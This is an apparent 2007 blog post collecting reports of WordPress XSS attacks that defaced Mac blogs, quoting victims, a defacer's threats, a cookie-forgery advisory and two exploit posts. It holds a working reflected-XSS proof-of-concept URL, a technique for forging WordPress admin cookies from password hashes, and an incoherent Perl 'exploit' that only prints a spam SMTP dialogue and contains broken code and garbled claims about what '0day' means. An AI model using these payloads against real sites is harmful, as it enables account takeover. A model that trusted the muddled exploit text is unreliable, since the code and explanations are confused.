There have been a lot of Mac web blogs hacker defaced recently by hackers that are using 0day XSS scripting exploits in Wordpress.

One victim of the 0day XSS Miles Evans from MacApper.com writes:

“I took the liberty of analyzing the hack a bit in the hopes it helps others prevent this from happening to them. Although we had updated our blog to the latest version of Wordpress, near as I can tell the hack was accomplished via an XSS (cross site scripting) exploit. By executing some malicious code in the query string the hacker was able to write to our .htaccess file the following:

#this is for rotten mac fanbois - suck it down.
#RewriteRule ^divider.png$ /rotten/divider.png [L]
#RewriteRule ^rotten.jpg$ /rotten/rotten.jpg [L]
#RewriteCond %{REQUEST_URI} !^/rotten.*
#RewriteRule !rotten/index.html$ /rotten/index.html [L]

The problem is that the exploit appears to be unknown to Wordpress as far as I can see (I will be reporting it to them), so other Wordpress blogs may be susceptible. I wish I could offer more help.”

“[…] By default WP wants to handle the .htaccess file dynamically so it needs to be set world writable. We tweaked this before putting the blog back online and we should be safe now. If anyone needs a hand feel free to email me (milesevans _AT_ macapper.com).”

Loweded Wookie adds some helpful technical feedback for advanced Mac users:

“When I was using XOOPS I got hacked once but all the little retard did was create a file called index.html. All I did was alter the Apache file so that PHP files were executed before HTML files and any hack after that from little brained people would have been thwarted. Any further attempts to hack WordPress are thwarted by a simple permissions change. Of course .Mac accounts are different because the hacker would first have to find your machine, intercept the Kerberos encrypted password (yeah, good luck on that one), and then do some damage. Considering many .Mac pages are edited using iWeb then any hacked pages would be up for a grand total of… however long it takes to upload to .Mac. Hell, comment floods can be removed simply by clicking the comment box and hitting delete in iWeb.”

Another reader, Chris, asks the very question that came into our mind as we read this report:

“To even GET data to the server, it would have to be a type 2 attack. I doubt this was overlooked in the release of WordPress 2.3.1, since the primary release was for security. Secondly, the vulnerable page would have to be a publicly accessible page, making a type 2 XSS even more rare. Finally, why would you possibly leave your HTACCESS file world-writable, and how would this “hacker” write files back to your server using a type 2 exploit anyways? At most it could be redirected to another site. Please explain.”

Wookie offers more technical advice:

“It’s more common than you know. This was something that needed to be done on older versions of XOOPS. It had to have at least administrator rights to access the file but the passwords etc are all plain text so it’s reasonably easy to hack a PHP based content management system and WordPress is no exception.”

Another Macintosh web blog, GlenWolsey.com, a Macblog site on blogspot has been taken down by a blackhat XSS hacker. The black-hat technique used in this attack was also a Wordpress XSS overwriting of a world-writable .HTACESS file.

A quote from the hacked site: “This website has been flagged for excessive Apple fanboism, and has been taken down for 24 hours. This is a message to the rest of the Mac community, so listen up. Ever heard of hubris? Tone it down, and you will not be attacked. Everyone else is open game.”

The XSS Blackhat hacker, known as Malcor, has posted many threats to his own pages:

“The target will be posted on this site once the attack begins. I will be sending said target a note with a heads up before. Hopefully, by the end of the attack, a sea change will begin to happen. Does anyone disagree with me that the Mac world be a much more pleasant place if smugness wasn’t tolerated?”

“The attacks will be untraceable, and unstoppable.”

Source: http://malcor.blogspot.com

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system. Most content management systems and blogs save user passwords as hashes in the underlying database. So even if attackers were to get access to the hashes stored in the database, for instance by means of an SQL injection hole, they have not been able to do much with them up to now.”

http://en.wikipedia.org/wiki/Password_Cracking

“Specifically, if they want to recover the passwords, they would have to compare a hash with entries in a “rainbow table” – a process that can take some time and may not work at all for long passwords, for which there simply are no tables.”

“But according to a security advisory published by Stephen J. Murdoch of the University of Cambridge, a property in WordPress can be exploited to get access without the password. Instead of trying to obtain the password, Murdoch used its hash to generate an authentication cookie to gain access to the system. A member of the core team behind The Onion Router (TOR) anonymization project, Murdoch says that the MD5 hash only has to be hashed a second time with MD5. According to his report, the authentication procedure implemented in WordPress then looks like:

wordpresspass_<MD5(url)>=MD5(user_pass)

Here, the URL is clearly spelled out, and user_pass corresponds to the hash (MD5(password)). Along with the wordpressuser cookie (that wordpressuser_<MD5(url)>=admin), access is then reportedly provided to the WordPress admin account. Murdoch says he has informed the developers of WordPress of the problem, but they have yet to react.”

http://en.wikipedia.org/wiki/HTTP_cookie

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system.”

This attack is very dangerous 0day for wordpress 2.3, and it only requires the hacker to compromise adminitrator access to wordpress using another more serious hole, and then instead of using admin access or creating new users or modifying user or backdoor into wordpress, he can take encrypted md5 from hacked database and gain access as a user to the wordpress he has previously hacked. All user are encouraged for upgrades. See more:

Sources:

http://heise-security.co.uk/ - Security and Internet Security Expert Consultants.

http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.’

Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.

We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;

–snips

With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.

Exploit code for perl whitehats included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj

Title of XSS Vulnerability:  [waraxe-2007-SA#059] - XSS in WordPress 2.3

Credit of XSS Discovery: Janek Vind “waraxe”
XSS Discovery Date: 27. October 2007
XSS Discovery Location: Estonia, Tartu
Web address for XSS security alert: http://www.waraxe.us/advisory-59.html

Description of XSS Exploit:

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability, at expense of security.

To run WordPress your host just needs a couple of things:

PHP version 4.2 or greater
MySQL version 4.0 or greater

Technical XSS Information: Cross-Site Scripting (XSS) in “edit-post-rows.php”

WARAXE Writes: Let’s take have a look inside “/wp-admin/edit-post-rows.php”:

[start of section of source code with XSS exploit for wordpress]

<?php foreach($posts_columns as $column_display_name) { ?>
<th scope=”col”><?php echo $column_display_name; ?></th>
<?php } ?>

[end of vulnerable source code section]

As we can see, array “posts_columns” is uninitialized and if we execute this php script directly, then arbitrary value for that variable can be delivered. This means, that reflective XSS exists here.

And of course register_globals must be on for this “exploit” to be successful.

XSS Proof of concept worm:

http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script>

The information above has been provided by the website of WARAXE.US